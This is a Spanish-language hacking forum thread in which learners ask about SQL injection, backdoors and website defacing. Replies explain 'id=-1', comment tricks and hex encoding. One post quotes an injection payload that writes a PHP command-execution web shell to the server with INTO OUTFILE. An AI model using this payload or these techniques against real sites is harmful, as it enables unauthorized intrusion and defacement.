No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No necesariamente necesitas un programa .. podes crear uno estudiendo  Perl , C , etc ... y ese "mediador" entre el servidor y tu maquina puede ser por ejemplo Netcat ...   nose si me explique bien , y si aclare tus dudas

Cualquier cosa pregunta

Saludos

bueno, me refiero mas bien a los puertos, el programa los abré o yo tengo q hacerlo teniendo acceso fisico a la maquina objetivo?

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
contestando al pregunta ID=-1 significa que el paremtro q tomara el php para hacer la consulta sera -1 naa mas ahora con lo de los comentarios normalmente se usan /*,--.# si es q ninguno de esos te vale quiere decir q la consulta a la base de datos derrepente esta compuesta por varios select entonces no te deja comentarlos asi por asi noma bueno en general no te funciona porq al hacer un comentario en la consulta probocas un error en la consulta por ejemplo
select * from (id=1) ahora q pasa si tu comentas select * from (id=-1/*) te mandara un error porq estas haciendo al poner comentario que la consulta sea erronea y por ultimo puedes sacar las palabras en hex usando el mismo sql solo ejecutas en el phpmyadmin  o cualquier administrador de base de datos la siguiente consulta select hex('palabra') ahi te mandara las palabras en hex bueno espero te sirva saludos;)

OK, gracias hermano, buena respuesta, no sabía lo del select hex('palabra')

hola amigo, estoy aprendiendo sobre el hack y conosco las sentencias basicas de sql pero en la inyeccion me destantean algunos codigos, no se si me puedas explicar solo algunos detalles, por ejemplo de la sig.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta"<?php $cmd = $_GET['agarrala']; system ($cmd);?>",2,3,4+into+outfile+'../../www/cmd.php'--
el ?id= se usará siempre o se cambia dependiendo del codigo fuente de la pagina; si ocupan <input type= text name="numcuenta" y <input type= password name="clave" inyecto como :
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta .............. ?
y ese "=-1 " el guion 1 significa comentario en campo 1 ?
te agradesco tu aporte

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
E visto que en muchos foros preguntan:

quiero aprender a defecear por donde comienzo?
El Objetivo es que los usuarios,clarifiquen su camino y no se pierdan en lo que es el defacing,y que muestren interes en una rama del hacking interesante como lo es la Busqueda de vulnerabilidades a nivel web

Hola soy tecnico en programacion y aficionado a la informática-hacking, leyendo vcarios artículos del foro me doy cuenta q para crear las backdoor necesitan algunos programas, pero mi gran duda es como se comunican remotamente por la web con otro pc,es decir se abren puertos pero instalando el exploit o troyano enla maquina objetivo? o para cualquier tipo de sistema se tiene q tener acceso fisico a la computadora objetivo?
Le agradecería muchisimo una orientacion
saludos

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exelente Tutorial. Lo dejo fijo para que no se pierda en el tiempo.
Saludos!

Hola disculpa mi ignorancia pero creo q varios tenemos la duda de q significa "Id=-1 " en algunos casos no acepta los caracteres de /**/ ni -- para indicar q luego de éstos solo hay comentarios y donde podemos sacar palabras en hexadecimal para usarlas en la inyeccion?
gracias